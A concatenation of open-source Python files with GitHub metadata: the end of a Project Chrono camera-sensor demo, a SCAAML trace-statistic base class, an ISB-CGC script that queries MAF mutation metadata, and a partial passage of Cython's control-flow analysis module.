mphysicalSystem.Add(mesh_body)
# -----------------------
# Create a sensor manager
# -----------------------
manager = sens.ChSensorManager(mphysicalSystem)
intensity = 1.0
manager.scene.AddPointLight(chrono.ChVectorF(2, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
manager.scene.AddPointLight(chrono.ChVectorF(9, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
manager.scene.AddPointLight(chrono.ChVectorF(16, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
manager.scene.AddPointLight(chrono.ChVectorF(23, 2.5, 100), chrono.ChColor(intensity, intensity, intensity), 500.0)
# ------------------------------------------------
# Create a camera and add it to the sensor manager
# ------------------------------------------------
offset_pose = chrono.ChFrameD(
chrono.ChVectorD(-5, 0, 2), chrono.Q_from_AngAxis(2, chrono.ChVectorD(0, 1, 0)))
cam = sens.ChCameraSensor(
mesh_body, # body camera is attached to
update_rate, # update rate in Hz
offset_pose, # offset pose
image_width, # image width
image_height, # image height
fov # camera's horizontal field of view
)
cam.SetName("Camera Sensor")
cam.SetLag(lag)
cam.SetCollectionWindow(exposure_time)
# ------------------------------------------------------------------
# Create a filter graph for post-processing the data from the camera
# ------------------------------------------------------------------
if noise_model == "CONST_NORMAL":
cam.PushFilter(sens.ChFilterCameraNoiseConstNormal(0.0, 0.02))
elif noise_model == "PIXEL_DEPENDENT":
cam.PushFilter(sens.ChFilterCameraNoisePixDep(0, 0.02, 0.03))
elif noise_model == "NONE":
# Don't add any noise models
pass
# Renders the image at current point in the filter graph
if vis:
cam.PushFilter(sens.ChFilterVisualize(
image_width, image_height, "Before Grayscale Filter"))
# Provides the host access to this RGBA8 buffer
cam.PushFilter(sens.ChFilterRGBA8Access())
# Save the current image to a png file at the specified path
if save:
cam.PushFilter(sens.ChFilterSave(out_dir + "rgb/"))
# Filter the sensor to grayscale
cam.PushFilter(sens.ChFilterGrayscale())
# Render the buffer again to see the new grayscaled image
if vis:
cam.PushFilter(sens.ChFilterVisualize(
int(image_width / 2), int(image_height / 2), "Grayscale Image"))
# Save the grayscaled image at the specified path
if save:
cam.PushFilter(sens.ChFilterSave(out_dir + "gray/"))
# Resizes the image to the provided width and height
cam.PushFilter(sens.ChFilterImageResize(
int(image_width / 2), int(image_height / 2)))
# Access the grayscaled buffer as R8 pixels
cam.PushFilter(sens.ChFilterR8Access())
# add sensor to manager
manager.AddSensor(cam)
# ---------------
# Simulate system
# ---------------
orbit_radius = 10
orbit_rate = 0.5
ch_time = 0.0
t1 = time.time()
while (ch_time < end_time):
cam.SetOffsetPose(chrono.ChFrameD(
chrono.ChVectorD(-orbit_radius * math.cos(ch_time * orbit_rate), -
orbit_radius * math.sin(ch_time * orbit_rate), 1),
chrono.Q_from_AngAxis(ch_time * orbit_rate, chrono.ChVectorD(0, 0, 1))))
# Access the RGBA8 buffer from the camera
rgba8_buffer = cam.GetMostRecentRGBA8Buffer()
if (rgba8_buffer.HasData()):
rgba8_data = rgba8_buffer.GetRGBA8Data()
print('RGBA8 buffer recieved from cam. Camera resolution: {0}x{1}'
.format(rgba8_buffer.Width, rgba8_buffer.Height))
print('First Pixel: {0}'.format(rgba8_data[0, 0, :]))
# Update sensor manager
# Will render/save/filter automatically
manager.Update()
# Perform step of dynamics
mphysicalSystem.DoStepDynamics(step_size)
# Get the current time of the simulation
ch_time = mphysicalSystem.GetChTime()
print("Sim time:", end_time, "Wall time:", time.time() - t1)
# -----------------
# Camera parameters
# -----------------
# Noise model attached to the sensor
# TODO: Noise models haven't been implemented in python
# noise_model="CONST_NORMAL" # Gaussian noise with constant mean and standard deviation
# noise_model="PIXEL_DEPENDENT" # Pixel dependent gaussian noise
# noise_model="RESPONSE_FUNCTION" # Noise model based on camera's response and parameters
noise_model = "NONE" # No noise model
# Camera lens model
# Either CameraLensModelType_PINHOLE or CameraLensModelType_FOV_LENS
lens_model = sens.CameraLensModelType_PINHOLE
# Update rate in Hz
update_rate = 30
# Image width and height
image_width = 1280
image_height = 720
# Camera's horizontal field of view
fov = 1.408
# Lag (in seconds) between sensing and when data becomes accessible
lag = 0
# Exposure (in seconds) of each image
exposure_time = 0
# ---------------------
# Simulation parameters
# ---------------------
# Simulation step size
step_size = 1e-3
# Simulation end time
end_time = 20.0
# Save camera images
save = False
# Render camera images
vis = True
# Output directory
out_dir = "SENSOR_OUTPUT/"
# The path to the Chrono data directory containing various assets (meshes, textures, data files)
# is automatically set, relative to the default location of this demo.
# If running from a different directory, you must change the path to the data directory with:
# chrono.SetChronoDataPath('path/to/data')
main()
| {
"content_hash": "60b201dd928a606d688f573b1dc325a4",
"timestamp": "",
"source": "github",
"line_count": 198,
"max_line_length": 119,
"avg_line_length": 33.87373737373738,
"alnum_prop": 0.6183092291635605,
"repo_name": "projectchrono/chrono",
"id": "38394a3fe06b25af569c4f4cae3f73a5326bac7f",
"size": "7474",
"binary": false,
"copies": "3",
"ref": "refs/heads/main",
"path": "src/demos/python/sensor/demo_SEN_camera.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7614"
},
{
"name": "C",
"bytes": "2409870"
},
{
"name": "C++",
"bytes": "26511084"
},
{
"name": "CMake",
"bytes": "645492"
},
{
"name": "CSS",
"bytes": "170326"
},
{
"name": "Cuda",
"bytes": "1226094"
},
{
"name": "Dockerfile",
"bytes": "3279"
},
{
"name": "GLSL",
"bytes": "4925"
},
{
"name": "HTML",
"bytes": "7922"
},
{
"name": "Inno Setup",
"bytes": "24125"
},
{
"name": "JavaScript",
"bytes": "4731"
},
{
"name": "Lex",
"bytes": "3433"
},
{
"name": "Lua",
"bytes": "651"
},
{
"name": "POV-Ray SDL",
"bytes": "25421"
},
{
"name": "PowerShell",
"bytes": "142"
},
{
"name": "Python",
"bytes": "645743"
},
{
"name": "SWIG",
"bytes": "317316"
},
{
"name": "Shell",
"bytes": "4827"
}
],
"symlink_target": ""
} |
"""Compute a statistic of many traces."""
from abc import ABC, abstractmethod
import numpy as np
class AbstractTraceStatistic(ABC):
"""Base class to compute a statistic over many traces.
Example use:
trace_stats = ChildClass()
for e in ExampleIterator(ds_path):
trace_stats.update(e['trace1'])
print(trace_stats.result())
"""
def __init__(self) -> None:
"""Create a new statistic computation."""
@abstractmethod
def update(self, trace: np.ndarray) -> None:
"""Update the statistic with a single trace.
Args:
trace: Numpy one dimensional array of floats.
"""
@abstractmethod
def result(self):
"""Return the statistic."""
| {
"content_hash": "ad6d88aa8c5439eb6c53d3bc530eb499",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 58,
"avg_line_length": 23.838709677419356,
"alnum_prop": 0.618403247631935,
"repo_name": "google/scaaml",
"id": "cdda994df89a09b131a137c8d5f850fbb637cbfc",
"size": "1314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scaaml/stats/trace_statistic_base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "75551"
},
{
"name": "Python",
"bytes": "386750"
},
{
"name": "Shell",
"bytes": "723"
}
],
"symlink_target": ""
} |
"""Script to parse MAF file
"""
from bigquery_etl.utils.gcutils import read_mysql_query
import sys
import json
import re
from pandas import ExcelWriter
writer = ExcelWriter('maf.xlsx')
def identify_data(config):
"""Gets the metadata info from database
"""
# cloudSql connection params
host = config['cloudsql']['host']
database = config['cloudsql']['db']
user = config['cloudsql']['user']
passwd = config['cloudsql']['passwd']
# sqlquery = """
# SELECT ParticipantBarcode, SampleBarcode, AliquotBarcode, Pipeline, Platform,
# SampleType, SampleTypeCode, Study, DatafileName, DatafileNameKey, Datatype,
# DatafileUploaded, IncludeForAnalysis, DataCenterName
# FROM metadata_data
# WHERE DatafileUploaded='true'
# AND DatafileNameKey LIKE '%.maf'
# AND IncludeForAnalysis='yes'
# """
sqlquery = """
SELECT ParticipantBarcode, SampleBarcode, AliquotBarcode, Pipeline, Platform,
SampleType, SampleTypeCode, Study, DatafileName, DatafileNameKey, Datatype,
DatafileUploaded, IncludeForAnalysis, DataCenterName
FROM metadata_data
WHERE Datatype='Mutations'
AND DatafileNameKey LIKE '%.maf'
AND DatafileUploaded='true'
AND IncludeForAnalysis='yes'
"""
#sqlquery = """ select datafilename, datafilenamekey from metadata_data where 0 < instr(datafilename, 'maf') and 'true' = datafileuploaded and 0 = instr(datafilename, 'protected') group by datafilename, dataarchivename;
#"""
# connect to db and get results in a dataframe
metadata_df = read_mysql_query(host, database, user, passwd, sqlquery)
# print metadata_df
for i, x in metadata_df.iterrows():
print x.to_dict()
# print metadata_df
sys.exit()
# rename platforms in rows
for i, row in metadata_df.iterrows():
metadata = row.to_dict()
metadata_df.loc[i, 'OutDatafileNameKey'] = config['mirna']['mirna']['output_dir']\
+ metadata['DatafileName'] + '.json'
#metadata_df.loc[:, 'SampleTypeLetterCode'] = metadata_df['SampleTypeCode']\
# .map(lambda code: config['sample_code2letter'][code])
metadata_df.loc[:, 'DatafileNameKey'] = metadata_df['DatafileNameKey']\
.map(lambda inputfile: re.sub(r"^/", "", inputfile))
# tag CELLC samples
metadata_df['transform_function'] = 'mirna.mirna.transform.parse_mirna'
print "Found {0} rows, columns." .format(str(metadata_df.shape))
# Filter - check all "is_" fields - remember all 'is_' fields must be boolean
all_flag_columns = [key for key in metadata_df.columns.values if key.startswith("is_")]
flag_df = metadata_df[all_flag_columns]
metadata_df = metadata_df[flag_df.all(axis=1)]
metadata_df.to_excel(writer, 'maf_files_metadata_table')
writer.save()
print "After filtering: Found {0} rows, columns." .format(str(metadata_df.shape))
return metadata_df
if __name__ == '__main__':
print identify_data(json.load(open(sys.argv[1])))
| {
"content_hash": "46dcb3c546e8cbca2007e466c6bef86a",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 223,
"avg_line_length": 40.43589743589744,
"alnum_prop": 0.6433100824350032,
"repo_name": "isb-cgc/ISB-CGC-data-proc",
"id": "88e8fe1549f7ea49a07c35c008577801a0bb2000",
"size": "3767",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tcga_etl_pipeline/maf/part1/extract2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "6576"
},
{
"name": "Python",
"bytes": "1169886"
},
{
"name": "Shell",
"bytes": "1068"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import cython
cython.declare(PyrexTypes=object, ExprNodes=object, Nodes=object,
Builtin=object, InternalError=object, error=object, warning=object,
py_object_type=object, unspecified_type=object,
object_expr=object, fake_rhs_expr=object, TypedExprNode=object)
from . import Builtin
from . import ExprNodes
from . import Nodes
from . import Options
from .PyrexTypes import py_object_type, unspecified_type
from . import PyrexTypes
from .Visitor import TreeVisitor, CythonTransform
from .Errors import error, warning, InternalError
from .Optimize import ConstantFolding
class TypedExprNode(ExprNodes.ExprNode):
# Used for declaring assignments of a specified type without a known entry.
def __init__(self, type, may_be_none=None, pos=None):
super(TypedExprNode, self).__init__(pos)
self.type = type
self._may_be_none = may_be_none
def may_be_none(self):
return self._may_be_none != False
object_expr = TypedExprNode(py_object_type, may_be_none=True)
# Fake rhs to silence "unused variable" warning
fake_rhs_expr = TypedExprNode(unspecified_type)
class ControlBlock(object):
"""Control flow graph node. Sequence of assignments and name references.
children set of children nodes
parents set of parent nodes
positions set of position markers
stats list of block statements
gen dict of assignments generated by this block
bounded set of entries that are definitely bounded in this block
Example:
a = 1
b = a + c # 'c' is already bounded or exception here
stats = [Assignment(a), NameReference(a), NameReference(c),
Assignment(b)]
gen = {Entry(a): Assignment(a), Entry(b): Assignment(b)}
bounded = set([Entry(a), Entry(c)])
"""
def __init__(self):
self.children = set()
self.parents = set()
self.positions = set()
self.stats = []
self.gen = {}
self.bounded = set()
self.i_input = 0
self.i_output = 0
self.i_gen = 0
self.i_kill = 0
self.i_state = 0
def empty(self):
return (not self.stats and not self.positions)
def detach(self):
"""Detach block from parents and children."""
for child in self.children:
child.parents.remove(self)
for parent in self.parents:
parent.children.remove(self)
self.parents.clear()
self.children.clear()
def add_child(self, block):
self.children.add(block)
block.parents.add(self)
class ExitBlock(ControlBlock):
"""Non-empty exit point block."""
def empty(self):
return False
class AssignmentList(object):
def __init__(self):
self.stats = []
class ControlFlow(object):
"""Control-flow graph.
entry_point ControlBlock entry point for this graph
exit_point ControlBlock normal exit point
block ControlBlock current block
blocks set children nodes
entries set tracked entries
loops list stack for loop descriptors
exceptions list stack for exception descriptors
"""
def __init__(self):
self.blocks = set()
self.entries = set()
self.loops = []
self.exceptions = []
self.entry_point = ControlBlock()
self.exit_point = ExitBlock()
self.blocks.add(self.exit_point)
self.block = self.entry_point
def newblock(self, parent=None):
"""Create floating block linked to `parent` if given.
NOTE: Block is NOT added to self.blocks
"""
block = ControlBlock()
self.blocks.add(block)
if parent:
parent.add_child(block)
return block
def nextblock(self, parent=None):
"""Create block children block linked to current or `parent` if given.
NOTE: Block is added to self.blocks
"""
block = ControlBlock()
self.blocks.add(block)
if parent:
parent.add_child(block)
elif self.block:
self.block.add_child(block)
self.block = block
return self.block
def is_tracked(self, entry):
if entry.is_anonymous:
return False
return (entry.is_local or entry.is_pyclass_attr or entry.is_arg or
entry.from_closure or entry.in_closure or
entry.error_on_uninitialized)
def is_statically_assigned(self, entry):
if (entry.is_local and entry.is_variable and
(entry.type.is_struct_or_union or
entry.type.is_complex or
entry.type.is_array or
entry.type.is_cpp_class)):
# stack allocated structured variable => never uninitialised
return True
return False
def mark_position(self, node):
"""Mark position, will be used to draw graph nodes."""
if self.block:
self.block.positions.add(node.pos[:2])
def mark_assignment(self, lhs, rhs, entry):
if self.block and self.is_tracked(entry):
assignment = NameAssignment(lhs, rhs, entry)
self.block.stats.append(assignment)
self.block.gen[entry] = assignment
self.entries.add(entry)
def mark_argument(self, lhs, rhs, entry):
if self.block and self.is_tracked(entry):
assignment = Argument(lhs, rhs, entry)
self.block.stats.append(assignment)
self.block.gen[entry] = assignment
self.entries.add(entry)
def mark_deletion(self, node, entry):
if self.block and self.is_tracked(entry):
assignment = NameDeletion(node, entry)
self.block.stats.append(assignment)
self.block.gen[entry] = Uninitialized
self.entries.add(entry)
def mark_reference(self, node, entry):
if self.block and self.is_tracked(entry):
self.block.stats.append(NameReference(node, entry))
## XXX: We don't track expression evaluation order so we can't use
## XXX: successful reference as initialization sign.
## # Local variable is definitely bound after this reference
## if not node.allow_null:
## self.block.bounded.add(entry)
self.entries.add(entry)
def normalize(self):
"""Delete unreachable and orphan blocks."""
queue = set([self.entry_point])
visited = set()
while queue:
root = queue.pop()
visited.add(root)
for child in root.children:
if child not in visited:
queue.add(child)
unreachable = self.blocks - visited
for block in unreachable:
block.detach()
visited.remove(self.entry_point)
for block in visited:
if block.empty():
for parent in block.parents: # Re-parent
for child in block.children:
parent.add_child(child)
block.detach()
unreachable.add(block)
self.blocks -= unreachable
def initialize(self):
"""Set initial state, map assignments to bits."""
self.assmts = {}
bit = 1
for entry in self.entries:
assmts = AssignmentList()
assmts.mask = assmts.bit = bit
self.assmts[entry] = assmts
bit <<= 1
for block in self.blocks:
for stat in block.stats:
if isinstance(stat, NameAssignment):
stat.bit = bit
assmts = self.assmts[stat.entry]
assmts.stats.append(stat)
assmts.mask |= bit
bit <<= 1
for block in self.blocks:
for entry, stat in block.gen.items():
assmts = self.assmts[entry]
if stat is Uninitialized:
block.i_gen |= assmts.bit
else:
block.i_gen |= stat.bit
block.i_kill |= assmts.mask
block.i_output = block.i_gen
for entry in block.bounded:
block.i_kill |= self.assmts[entry].bit
for assmts in self.assmts.values():
self.entry_point.i_gen |= assmts.bit
self.entry_point.i_output = self.entry_point.i_gen
def map_one(self, istate, entry):
ret = set()
assmts = self.assmts[entry]
if istate & assmts.bit:
if self.is_statically_assigned(entry):
ret.add(StaticAssignment(entry))
elif entry.from_closure:
ret.add(Unknown)
else:
ret.add(Uninitialized)
for assmt in assmts.stats:
if istate & assmt.bit:
ret.add(assmt)
return ret
def reaching_definitions(self):
"""Per-block reaching definitions analysis."""
dirty = True
while dirty:
dirty = False
for block in self.blocks:
i_input = 0
for parent in block.parents:
i_input |= parent.i_output
i_output = (i_input & ~block.i_kill) | block.i_gen
if i_output != block.i_output:
dirty = True
block.i_input = i_input
block.i_output = i_output
class LoopDescr(object):
def __init__(self, next_block, loop_block):
self.next_block = next_block
self.loop_block = loop_block
self.exceptions = []
class ExceptionDescr(object):
"""Exception handling helper.
entry_point ControlBlock Exception handling entry point
finally_enter ControlBlock Normal finally clause entry point
finally_exit ControlBlock Normal finally clause exit point
"""
def __init__(self, entry_point, finally_enter=None, finally_exit=None):
self.entry_point = entry_point
self.finally_enter = finally_enter
self.finally_exit = finally_exit
class NameAssignment(object):
def __init__(self, lhs, rhs, entry):
if lhs.cf_state is None:
lhs.cf_state = set()
self.lhs = lhs
self.rhs = rhs
self.entry = entry
self.pos = lhs.pos
self.refs = set()
self.is_arg = False
self.is_deletion = False
self.inferred_type = None
def __repr__(self):
return '%s(entry=%r)' % (self.__class__.__name__, self.entry)
def infer_type(self):
self.inferred_type = self.rhs.infer_type(self.entry.scope)
return self.inferred_type
def type_dependencies(self):
return self.rhs.type_dependencies(self.entry.scope)
@property
def type(self):
if not self.entry.type.is_unspecified:
return self.entry.type
return self.inferred_type
def __getstate__(self):
return (self.lhs, self.rhs, self.entry, self.pos,
self.refs, self.is_arg, self.is_deletion, self.inferred_type)
def __setstate__(self, state):
(self.lhs, self.rhs, self.entry, self.pos,
self.refs, self.is_arg, self.is_deletion, self.inferred_type) = state
class StaticAssignment(NameAssignment):
"""Initialised at declaration time, e.g. stack allocation."""
def __init__(self, entry):
if not entry.type.is_pyobject:
may_be_none = False
else:
may_be_none = None # unknown
lhs = TypedExprNode(
entry.type, may_be_none=may_be_none, pos=entry.pos)
super(StaticAssignment, self).__init__(lhs, lhs, entry)
def infer_type(self):
return self.entry.type
def type_dependencies(self):
return ()
class Argument(NameAssignment):
def __init__(self, lhs, rhs, entry):
NameAssignment.__init__(self, lhs, rhs, entry)
self.is_arg = True
class NameDeletion(NameAssignment):
def __init__(self, lhs, entry):
NameAssignment.__init__(self, lhs, lhs, entry)
self.is_deletion = True
def infer_type(self):
inferred_type = self.rhs.infer_type(self.entry.scope)
if (not inferred_type.is_pyobject and
inferred_type.can_coerce_to_pyobject(self.entry.scope)):
return py_object_type
self.inferred_type = inferred_type
return inferred_type
class Uninitialized(object):
"""Definitely not initialised yet."""
class Unknown(object):
"""Coming from outer closure, might be initialised or not."""
class NameReference(object):
def __init__(self, node, entry):
if node.cf_state is None:
node.cf_state = set()
self.node = node
self.entry = entry
self.pos = node.pos
def __repr__(self):
return '%s(entry=%r)' % (self.__class__.__name__, self.entry)
class ControlFlowState(list):
# Keeps track of Node's entry assignments
#
# cf_is_null [boolean] It is uninitialized
# cf_maybe_null [boolean] May be uninitialized
# is_single [boolean] Has only one assignment at this point
cf_maybe_null = False
cf_is_null = False
is_single = False
def __init__(self, state):
if Uninitialized in state:
state.discard(Uninitialized)
self.cf_maybe_null = True
if not state:
self.cf_is_null = True
elif Unknown in state:
state.discard(Unknown)
self.cf_maybe_null = True
else:
if len(state) == 1:
self.is_single = True
# XXX: Remove fake_rhs_expr
super(ControlFlowState, self).__init__(
[i for i in state if i.rhs is not fake_rhs_expr])
def one(self):
return self[0]
class GVContext(object):
"""Graphviz subgraph object."""
def __init__(self):
self.blockids = {}
self.nextid = 0
self.children = []
self.sources = {}
def add(self, child):
self.children.append(child)
def nodeid(self, block):
if block not in self.blockids:
self.blockids[block] = 'block%d' % self.nextid
self.nextid += 1
return self.blockids[block]
def extract_sources(self, block):
if not block.positions:
return ''
start = min(block.positions)
stop = max(block.positions)
srcdescr = start[0]
if not srcdescr in self.sources:
self.sources[srcdescr] = list(srcdescr.get_lines())
lines = self.sources[srcdescr]
return '\\n'.join([l.strip() for l in lines[start[1] - 1:stop[1]]])
def render(self, fp, name, annotate_defs=False):
"""Render graphviz dot graph"""
fp.write('digraph %s {\n' % name)
fp.write(' node [shape=box];\n')
for child in self.children:
child.render(fp, self, annotate_defs)
fp.write('}\n')
def escape(self, text):
return text.replace('"', '\\"').replace('\n', '\\n')
class GV(object):
"""Graphviz DOT renderer."""
def __init__(self, name, flow):
self.name = name
self.flow = flow
def render(self, fp, ctx, annotate_defs=False):
fp.write(' subgraph %s {\n' % self.name)
for block in self.flow.blocks:
label = ctx.extract_sources(block)
if annotate_defs:
for stat in block.stats:
if isinstance(stat, NameAssignment):
label += '\n %s [%s %s]' % (
stat.entry.name, 'deletion' if stat.is_deletion else 'definition', stat.pos[1])
elif isinstance(stat, NameReference):
if stat.entry:
label += '\n %s [reference %s]' % (stat.entry.name, stat.pos[1])
if not label:
label = 'empty'
pid = ctx.nodeid(block)
fp.write(' %s [label="%s"];\n' % (pid, ctx.escape(label)))
for block in self.flow.blocks:
pid = ctx.nodeid(block)
for child in block.children:
fp.write(' %s -> %s;\n' % (pid, ctx.nodeid(child)))
fp.write(' }\n')
class MessageCollection(object):
"""Collect error/warnings messages first then sort"""
def __init__(self):
self.messages = set()
def error(self, pos, message):
self.messages.add((pos, True, message))
def warning(self, pos, message):
self.messages.add((pos, False, message))
def report(self):
for pos, is_error, message in sorted(self.messages):
if is_error:
error(pos, message)
else:
warning(pos, message, 2)
def check_definitions(flow, compiler_directives):
flow.initialize()
flow.reaching_definitions()
# Track down state
assignments = set()
# Node to entry map
references = {}
assmt_nodes = set()
for block in flow.blocks:
i_state = block.i_input
for stat in block.stats:
i_assmts = flow.assmts[stat.entry]
state = flow.map_one(i_state, stat.entry)
if isinstance(stat, NameAssignment):
stat.lhs.cf_state.update(state)
assmt_nodes.add(stat.lhs)
i_state = i_state & ~i_assmts.mask
if stat.is_deletion:
i_state |= i_assmts.bit
else:
i_state |= stat.bit
assignments.add(stat)
if stat.rhs is not fake_rhs_expr:
stat.entry.cf_assignments.append(stat)
elif isinstance(stat, NameReference):
references[stat.node] = stat.entry
stat.entry.cf_references.append(stat)
stat.node.cf_state.update(state)
## if not stat.node.allow_null:
## i_state &= ~i_assmts.bit
## # after successful read, the state is known to be initialised
state.discard(Uninitialized)
state.discard(Unknown)
for assmt in state:
assmt.refs.add(stat)
# Check variable usage
warn_maybe_uninitialized = compiler_directives['warn.maybe_uninitialized']
warn_unused_result = compiler_directives['warn.unused_result']
warn_unused = compiler_directives['warn.unused']
warn_unused_arg = compiler_directives['warn.unused_arg']
messages = MessageCollection()
# assignment hints
for node in assmt_nodes:
if Uninitialized in node.cf_state:
node.cf_maybe_null = True
if len(node.cf_state) == 1:
node.cf_is_null = True
else:
node.cf_is_null = False
elif Unknown in node.cf_state:
node.cf_maybe_null = True
else:
node.cf_is_null = False
node.cf_maybe_null = False
# Find uninitialized references and cf-hints
for node, entry in references.items():
if Uninitialized in node.cf_state:
node.cf_maybe_null = True
if not entry.from_closure and len(node.cf_state) == 1:
node.cf_is_null = True
if (node.allow_null or entry.from_closure
or entry.is_pyclass_attr or entry.type.is_error):
pass # Can be uninitialized here
elif node.cf_is_null:
if entry.error_on_uninitialized or (
Options.error_on_uninitialized and (
entry.type.is_pyobject or entry.type.is_unspecified)):
messages.error(
node.pos,
"local variable '%s' referenced before assignment"
% entry.name)
else:
messages.warning(
node.pos,
"local variable '%s' referenced before assignment"
% entry.name)
elif warn_maybe_uninitialized:
messages.warning(
node.pos,
"local variable '%s' might be referenced before assignment"
% entry.name)
elif Unknown in node.cf_state:
# TODO: better cross-closure analysis to know when inner functions
# are being called before a variable is being set, and when
# a variable is known to be set before even defining the
# inner function, etc.
node.cf_maybe_null = True
else:
node.cf_is_null = False
node.cf_maybe_null = False
# Unused result
for assmt in assignments:
if (not assmt.refs and not assmt.entry.is_pyclass_attr
and not assmt.entry.in_closure):
if assmt.entry.cf_references and warn_unused_result:
if assmt.is_arg:
messages.warning(assmt.pos, "Unused argument value '%s'" %
assmt.entry.name)
else:
messages.warning(assmt.pos, "Unused result in '%s'" %
assmt.entry.name)
assmt.lhs.cf_used = False
# Unused entries
for entry in flow.entries:
if (not entry.cf_references
and not entry.is_pyclass_attr):
if entry.name != '_' and not entry.name.startswith('unused'):
# '_' is often used for unused variables, e.g. in loops
if entry.is_arg:
if warn_unused_arg:
messages.warning(entry.pos, "Unused argument '%s'" %
entry.name)
else:
if warn_unused:
messages.warning(entry.pos, "Unused entry '%s'" %
entry.name)
entry.cf_used = False
messages.report()
for node in assmt_nodes:
node.cf_state = ControlFlowState(node.cf_state)
for node in references:
node.cf_state = ControlFlowState(node.cf_state)
class AssignmentCollector(TreeVisitor):
def __init__(self):
super(AssignmentCollector, self).__init__()
self.assignments = []
def visit_Node(self):
self._visitchildren(self, None)
def visit_SingleAssignmentNode(self, node):
self.assignments.append((node.lhs, node.rhs))
def visit_CascadedAssignmentNode(self, node):
for lhs in node.lhs_list:
self.assignments.append((lhs, node.rhs))
class ControlFlowAnalysis(CythonTransform):
def visit_ModuleNode(self, node):
self.gv_ctx = GVContext()
self.constant_folder = ConstantFolding()
# Set of NameNode reductions
self.reductions = set()
self.in_inplace_assignment = False
self.env_stack = []
self.env = node.scope
self.stack = []
self.flow = ControlFlow()
self.visitchildren(node)
check_definitions(self.flow, self.current_directives)
dot_output = self.current_directives['control_flow.dot_output']
if dot_output:
annotate_defs = self.current_directives['control_flow.dot_annotate_defs']
fp = open(dot_output, 'wt')
try:
self.gv_ctx.render(fp, 'module', annotate_defs=annotate_defs)
finally:
fp.close()
return node
def visit_FuncDefNode(self, node):
for arg in node.args:
if arg.default:
self.visitchildren(arg)
self.visitchildren(node, ('decorators',))
self.env_stack.append(self.env)
self.env = node.local_scope
self.stack.append(self.flow)
self.flow = ControlFlow()
# Collect all entries
for entry in node.local_scope.entries.values():
if self.flow.is_tracked(entry):
self.flow.entries.add(entry)
self.mark_position(node)
# Function body block
self.flow.nextblock()
for arg in node.args:
self._visit(arg)
if node.star_arg:
self.flow.mark_argument(node.star_arg,
TypedExprNode(Builtin.tuple_type,
may_be_none=False),
node.star_arg.entry)
if node.starstar_arg:
self.flow.mark_argument(node.starstar_arg,
TypedExprNode(Builtin.dict_type,
may_be_none=False),
node.starstar_arg.entry)
self._visit(node.body)
# Workaround for generators
if node.is_generator:
self._visit(node.gbody.body)
# Exit point
if self.flow.block:
self.flow.block.add_child(self.flow.exit_point)
# Cleanup graph
self.flow.normalize()
check_definitions(self.flow, self.current_directives)
self.flow.blocks.add(self.flow.entry_point)
self.gv_ctx.add(GV(node.local_scope.name, self.flow))
self.flow = self.stack.pop()
self.env = self.env_stack.pop()
return node
def visit_DefNode(self, node):
node.used = True
return self.visit_FuncDefNode(node)
def visit_GeneratorBodyDefNode(self, node):
return node
def visit_CTypeDefNode(self, node):
return node
def mark_assignment(self, lhs, rhs=None):
if not self.flow.block:
return
if self.flow.exceptions:
exc_descr = self.flow.exceptions[-1]
self.flow.block.add_child(exc_descr.entry_point)
self.flow.nextblock()
if not rhs:
rhs = object_expr
if lhs.is_name:
if lhs.entry is not None:
entry = lhs.entry
else:
entry = self.env.lookup(lhs.name)
if entry is None: # TODO: This shouldn't happen...
return
self.flow.mark_assignment(lhs, rhs, entry)
elif lhs.is_sequence_constructor:
for i, arg in enumerate(lhs.args):
if not rhs or arg.is_starred:
item_node = None
else:
item_node = rhs.inferable_item_node(i)
self.mark_assignment(arg, item_node)
else:
self._visit(lhs)
if self.flow.exceptions:
exc_descr = self.flow.exceptions[-1]
self.flow.block.add_child(exc_descr.entry_point)
self.flow.nextblock()
def mark_position(self, node):
"""Mark position if DOT output is enabled."""
if self.current_directives['control_flow.dot_output']:
self.flow.mark_position(node)
def visit_FromImportStatNode(self, node):
for name, target in node.items:
if name != "*":
self.mark_assignment(target)
self.visitchildren(node)
return node
def visit_AssignmentNode(self, node):
raise InternalError("Unhandled assignment node")
def visit_SingleAssignmentNode(self, node):
self._visit(node.rhs)
self.mark_assignment(node.lhs, node.rhs)
return node
def visit_CascadedAssignmentNode(self, node):
self._visit(node.rhs)
for lhs in node.lhs_list:
self.mark_assignment(lhs, node.rhs)
return node
def visit_ParallelAssignmentNode(self, node):
collector = AssignmentCollector()
collector.visitchildren(node)
for lhs, rhs in collector.assignments:
self._visit(rhs)
for lhs, rhs in collector.assignments:
self.mark_assignment(lhs, rhs)
return node
def visit_InPlaceAssignmentNode(self, node):
self.in_inplace_assignment = True
self.visitchildren(node)
self.in_inplace_assignment = False
self.mark_assignment(node.lhs, self.constant_folder(node.create_binop_node()))
return node
def visit_DelStatNode(self, node):
for arg in node.args:
if arg.is_name:
entry = arg.entry or self.env.lookup(arg.name)
if entry.in_closure or entry.from_closure:
error(arg.pos,
"can not delete variable '%s' "
"referenced in nested scope" % entry.name)
if not node.ignore_nonexisting:
self._visit(arg) # mark reference
self.flow.mark_deletion(arg, entry)
else:
self._visit(arg)
return node
def visit_CArgDeclNode(self, node):
entry = self.env.lookup(node.name)
if entry:
may_be_none = not node.not_none
self.flow.mark_argument(
node, TypedExprNode(entry.type, may_be_none), entry)
return node
def visit_NameNode(self, node):
if self.flow.block:
entry = node.entry or self.env.lookup(node.name)
if entry:
self.flow.mark_reference(node, entry)
if entry in self.reductions and not self.in_inplace_assignment:
error(node.pos,
"Cannot read reduction variable in loop body")
return node
def visit_StatListNode(self, node):
if self.flow.block:
for stat in node.stats:
self._visit(stat)
if not self.flow.block:
stat.is_terminator = True
break
return node
def visit_Node(self, node):
self.visitchildren(node)
self.mark_position(node)
return node
def visit_IfStatNode(self, node):
next_block = self.flow.newblock()
parent = self.flow.block
# If clauses
for clause in node.if_clauses:
parent = self.flow.nextblock(parent)
self._visit(clause.condition)
self.flow.nextblock()
self._visit(clause.body)
if self.flow.block:
self.flow.block.add_child(next_block)
# Else clause
